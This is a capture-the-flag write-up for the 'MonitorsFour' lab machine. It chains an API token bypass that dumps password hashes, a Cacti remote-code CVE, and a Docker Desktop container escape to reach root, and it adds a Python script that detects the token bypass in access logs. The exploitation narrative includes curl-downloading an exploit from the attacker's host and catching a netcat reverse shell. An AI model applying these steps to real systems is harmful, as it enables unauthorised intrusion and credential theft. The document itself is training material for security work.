MonitorsFour
Information Gathering
> nmap 10.129.17.45 -sCV -oN htb/MonitorsFour/nmap -p-
| port | service |
|---|---|
| 80 | http/nginx |
| 5985 | http/Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |
Port 5985
The root of the website is a 404 page. Running dirsearch showed a few 403 errors but nothing accessible.
Port 80
subdomains:
- cacti.monitorsfour.htb
Directories found using dirsearch:
- /contact
- /login
- /user
- /static
- /views
In the login page source code we can see that it makes a POST request to /api/v1/auth.
Trying to access these directories on both port 80 and port 5985 returns nothing. Let's see which API the forgot-password page uses.
As expected, it's using the same API; this time it calls /api/v1/reset to reset a user's password.
From here, it might be best to open Burp Suite repeater and view server responses.
cacti
- Version 1.2.28, vulnerable to CVE-2025-24367, which allows authenticated users to execute arbitrary PHP scripts.
- /cacti/README.md
- /cacti/links.php
- /cacti/LICENSE
- /cacti/docs
- /cacti/CHANGELOG
- /cacti/about.php
Exploitation of this later…
Exploitation
In Burp Suite, I try different things, such as testing different HTTP methods (POST, PUT, etc.) against /api/v1/users.
I want to poke at /api/v1/users first so I can get a list of users, reset a user's password or add a new user. The big clue here is the response saying that a token is missing. Adding a token in the request body still returns "token missing". Making the request as GET /api/v1/users?token=meow gives a different response: the token is invalid.
The request GET /api/v1/users?token=0 returns a list of users, emails, password hashes and other user information. In this list we see the admin's email and password hash. I will try to crack the admin password; if that does not work, we will try the other users' passwords and hope that one of them is weak.
| id | username | email | password | role | token |
|---|---|---|---|---|---|
| 2 | admin | [email protected] | 56b32eb43e6f15395f6c46c1c9e1cd36 | super user | 8024b78f83f102da4f |
Luckily, the admin had a very bad password! -> wonderful1
- This was cracked using crackstation.net
- Using this password we can login into the web portal.
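The API behaviour above (a missing token, then "invalid" for token=meow, then a full user dump for token=0) leaves a clear trail in the web server's access log. The following Python script is an added example, not code from the box or from this writeup: it parses constructed nginx-style access log lines and flags (a) a client racking up unauthorised /api/v1/ calls and (b) a 200 response to an /api/v1/ request whose token parameter is empty, a sentinel such as 0 or null, or shorter than a real token. The sample log lines, the 16-character minimum token length and the probing threshold are assumptions chosen for the example.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qs

# nginx "combined" format: client, ident, user, [time], "METHOD target proto", status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)

# Token values that should never authenticate anything. A 200 returned alongside
# one of these means the server's token check is not a real comparison.
WEAK_TOKEN_RE = re.compile(r'^(?:0+|-1|null|none|false|true|undefined)?$', re.I)
MIN_TOKEN_LEN = 16       # assumption: genuine tokens on this app are 18 hex chars
API_PREFIX = "/api/v1/"
FAILURE_THRESHOLD = 3    # unauthorised API calls from one client before we call it probing

# Constructed sample lines (not a capture from the box). The last token is made up.
SAMPLE_LOG = """\
10.10.14.5 - - [12/Jan/2026:10:00:01 +0000] "GET /login HTTP/1.1" 200 1532 "-" "Mozilla/5.0"
10.10.14.5 - - [12/Jan/2026:10:00:07 +0000] "POST /api/v1/users HTTP/1.1" 401 48 "-" "Mozilla/5.0"
10.10.14.5 - - [12/Jan/2026:10:00:09 +0000] "PUT /api/v1/users HTTP/1.1" 401 48 "-" "Mozilla/5.0"
10.10.14.5 - - [12/Jan/2026:10:00:15 +0000] "GET /api/v1/users?token=meow HTTP/1.1" 401 51 "-" "Mozilla/5.0"
10.10.14.5 - - [12/Jan/2026:10:00:21 +0000] "GET /api/v1/users?token=0 HTTP/1.1" 200 2210 "-" "Mozilla/5.0"
10.10.14.9 - - [12/Jan/2026:10:01:00 +0000] "GET /api/v1/users?token=1f3c9a7e5d2b4086aa HTTP/1.1" 200 2210 "-" "Mozilla/5.0"
"""


def parse_line(line):
    """Turn one access-log line into a dict with path, status and token, or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    parts = urlsplit(rec["target"])
    rec["path"] = parts.path
    # keep_blank_values so "token=" (empty) is seen as a present-but-empty token
    rec["token"] = parse_qs(parts.query, keep_blank_values=True).get("token", [None])[0]
    return rec


def analyse(log_text):
    """Return a list of findings: weak tokens that were accepted, and clients probing the API."""
    findings = []
    failures = defaultdict(int)
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None or not rec["path"].startswith(API_PREFIX):
            continue
        if rec["status"] in (401, 403):
            failures[rec["ip"]] += 1
        tok = rec["token"]
        weak = tok is not None and (WEAK_TOKEN_RE.match(tok) is not None or len(tok) < MIN_TOKEN_LEN)
        if rec["status"] == 200 and weak:
            findings.append({"type": "weak_token_accepted", "ip": rec["ip"],
                             "path": rec["path"], "token": tok})
    for ip, n in failures.items():
        if n >= FAILURE_THRESHOLD:
            findings.append({"type": "api_probing", "ip": ip, "failures": n})
    return findings


if __name__ == "__main__":
    for f in analyse(SAMPLE_LOG):
        print(f)
```

On the sample data this reports the token=0 request from 10.10.14.5 as an accepted weak token and the same client as probing after three unauthorised calls, while the request carrying a full-length token passes. The weak-token rule is the one worth keeping in a real detection: an authenticated 200 on a token that is empty or a sentinel is evidence of a broken check, not of a stolen credential.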
First thing that jumps out to me in this portal is that we can generate an API key. (This ends up not being important haha)
Doing the boring stuff and reading the Changelog, I see they mention they migrated their infrastructure to Windows and Docker Desktop 4.44.2.
- Sure enough! -> “critical vulnerability known as CVE-2025-9074, which allows local running Linux containers to access the Docker Engine API without authentication.” – good thing I read that!
- So it seems that the host is Windows and it is running a docker container where the website is running and hosted on port 80.
After poking at it with some CVE PoCs and reading about the vulnerability, it seems we first need access to the local network shared by the container and the host machine. Once we have a foothold on the container, I think we can escape it using this CVE.
- The website is running PHP, maybe we can get a shell…
Pivoting to the cacti subdomain we see a login page. ‘admin’ username doesn’t work but the username ‘marcus’ with the same password does get us logged in.
- Now that we are authenticated we can use CVE-2025-24367. (Found earlier by getting the version of cacti)
After getting a shell with that CVE we can try the exploit in Docker Hub that we found earlier.
- But first, the user flag is at /home/marcus/user.txt
We can move the PoC to the remote Docker container by hosting a Python HTTP server and running curl -O <our ip>:<port>/exploit.c from /tmp on the target.
Then we point the exploit at 192.168.65.7:2375. We can get this address and port by running deepce in the container. There seems to be an issue with stdout, so the exploit's output doesn't display properly; I set up a netcat listener and get a reverse shell through the exploit instead. This works and whoami returns root. At first I'm not sure what we are; I think we are in a new Docker container (we are).
The hostname as www-data@821fbd6a43fa is 821fbd6a43fa; after running the exploit, the hostname of the new shell is 1fa179f5a2c3.
With root on this new container from the exploit, we have access to hostc, which is the main file system of the host. The root flag is at hostc/Users/Administrator/Desktop/root.txt